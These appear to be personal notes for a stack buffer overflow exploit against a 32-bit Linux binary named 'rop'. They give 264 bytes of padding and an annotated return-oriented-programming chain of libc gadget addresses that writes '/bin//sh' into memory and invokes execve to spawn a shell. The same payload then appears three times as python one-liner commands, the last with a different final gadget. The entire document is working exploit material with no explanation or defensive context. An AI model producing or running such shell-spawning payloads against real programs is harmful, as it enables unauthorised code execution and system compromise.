"A"*264
+ 0xb7e4404f	pop eax ;ret
+ "/bin"	nib/
+ 0xb7e21a9e	pop edx ;ret
+ 0xbffff22c	substracted 4 from address as per requirement by gadget
		address(+4) to write "/bin" to(i.e. 0xbffff230)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e4404f	pop eax ;ret
+ "//sh"	
+ 0xb7e21a9e	pop edx ;ret
+ 0xbffff230	substracted 4 from address as per requirement by gadget
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7e9e59f	xor eax eax ; ret ;;
+ 0xb7e21a9e	pop edx ;ret
+ 0xbffff234	address(+4) to write NULL bytes to.(i.e. 0x0804a020)(now 0xbffff0d8)
+ 0xb7f0a8f9	mov [edx+0x4] eax ;ret
+ 0xb7f1da81	pop edx ; pop ecx ; pop ebx ;ret
+ 0xbffff238
+ 0xbffff238
+ 0xbffff230	pointer of string "/bin//sh"
+ 0xb7f693e6	add eax 0xb ;ret
+ 0xb7ed9c25	call dword [gs:0x10] ;ret


./rop `python -c 'print "A"*264+"\x4f\x40\xe4\xb7"+"nib/"+"\x9e\x1a\xe2\xb7"+"\x2c\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"hs//"+"\x9e\x1a\xe2\xb7"+"\x30\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x9f\xe5\xe9\xb7"+"\x9e\x1a\xe2\xb7"+"\x34\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x81\xda\xf1\xb7"+"\x38\xf2\xff\xbf"+"\x38\xf2\xff\xbf"+"\x30\xf2\xff\xbf"+"\xe6\x93\xf6\xb7"+"\x25\x9c\xed\xb7"'`

`python -c 'print "A"*264+"\x4f\x40\xe4\xb7"+"nib/"+"\x9e\x1a\xe2\xb7"+"\x2c\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"hs//"+"\x9e\x1a\xe2\xb7"+"\x30\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x9f\xe5\xe9\xb7"+"\x9e\x1a\xe2\xb7"+"\x34\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x81\xda\xf1\xb7"+"\x38\xf2\xff\xbf"+"\x38\xf2\xff\xbf"+"\x30\xf2\xff\xbf"+"\xe6\x93\xf6\xb7"+"\x25\x9c\xed\xb7"'`

`python -c 'print "A"*264+"\x4f\x40\xe4\xb7"+"nib/"+"\x9e\x1a\xe2\xb7"+"\x2c\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x4f\x40\xe4\xb7"+"hs//"+"\x9e\x1a\xe2\xb7"+"\x30\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x9f\xe5\xe9\xb7"+"\x9e\x1a\xe2\xb7"+"\x34\xf2\xff\xbf"+"\xf9\xa8\xf0\xb7"+"\x81\xda\xf1\xb7"+"\x38\xf2\xff\xbf"+"\x38\xf2\xff\xbf"+"\x30\xf2\xff\xbf"+"\xe6\x93\xf6\xb7"+"\xb0\xf1\xfd\xb7"'`
